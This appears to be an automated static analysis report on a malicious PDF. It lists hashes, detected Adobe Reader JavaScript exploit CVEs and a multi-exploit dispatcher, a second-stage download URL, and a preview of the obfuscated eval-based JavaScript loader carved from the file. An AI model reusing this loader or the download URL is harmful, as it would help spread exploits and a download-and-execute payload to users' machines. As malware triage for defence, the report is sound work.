Malicious PDF — malware analysis report

Static analysis result for SHA-256 eee2a5dd96b2b186…

MALICIOUS

PDF

Size: 12.5 KB
First seen: 2026-05-08
MD5: 6985bff82f825cf0986d9a16e064615f
SHA-1: 1fd09581014a89fbd9916a3d57f0f93f3ea0f700
SHA-256: eee2a5dd96b2b18691f24821b21b1f40177225682d48a3a70459bdf4ac57d80a
Risk score: 490

Machine Learning

  • Nyx PDF Classifier: malicious, score 1.0000

Heuristics (12)

  • media.newPlayer — CVE-2009-4324 | critical | CVE match: exact | CVE_2009_4324
    PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(); it was actively exploited as a zero-day in December 2009. (Identified after JavaScript deobfuscation.)
  • Collab.getIcon — CVE-2009-0927 | critical | CVE match: exact | CVE_2009_0927
    PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument; it allows arbitrary code execution. (Identified after JavaScript deobfuscation.)
  • Collab.collectEmailInfo — CVE-2007-5659 | critical | CVE match: exact | CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(); it is one of a series of Acrobat JavaScript API exploits. (Identified after JavaScript deobfuscation.)
  • util.printf — CVE-2008-2992 | critical | CVE match: exact | CVE_2008_2992
    PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument; it was widely exploited in the wild after disclosure. (Identified after JavaScript deobfuscation.)
  • Pidief-style multi-CVE JavaScript dispatcher | critical | CVE match: likely | PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit | critical | PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF selects old Reader vulnerabilities by viewer version and runs heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage | high | PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action | low | 2 related findings | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL | high | PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL, stored either as little-endian %uXXXX Unicode escapes or hex-encoded in a document metadata field (/CreationDate, /Title) that the decoded script references. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://serj3info.ns2.name/u.php?f=45&e=5 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0076_000.js | pdf-javascript-stream | PDF /JS object 76 at offset 0x383 | 11688 bytes
SHA-256: a8e78d7cbf1a82e79bd0599cf9c132958421de94f2cff5b61dbd0a6df6b4d889
Preview script
First 1,000 lines of the extracted script
w='';
w+='sl';
w+='i';
w+="ce";
j='b343tb3g';
j=j[w];
a="]rjQb>D9+c&3dh%S@etWI.w/Pkl'24xi,;Mo|8gp()ufNV15v7q_'6[U=G:CA-ym a}E{0*zn<Ks";
b='al';
b2="v"
+b;
try
{
if(!google.search())throw 1;
}
catch(her436j34k76)
{
e=(j());
try{
b='e'+b2;
if(!google.search())
a=2;
}
catch(q){
e=e[b];
}
s='';try{if(!google.search())throw 1;}catch(q){r=1;}{
for(i=0;i<z.length;i++)
try{if(!google.search())throw 1;}catch(q){
s
+=
a[
z[i]];
}
}}

"))";try{if(!google)throw 1;}catch(q){e(s);}
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (alphabet-index-array) from JavaScript object 76 at offset 0x383 | 3864 bytes
SHA-256: c725ced5af1697fa33abb99d2893d2f62084d025fde38328440ef7ad4a86de57
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery (percent-decode) from JavaScript object 76 at offset 0x383 | 3860 bytes
SHA-256: 3179731a13f08e5abcec3b1488884ad4a2bd0bd2b85c56c8c18e6acdd48d19f2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script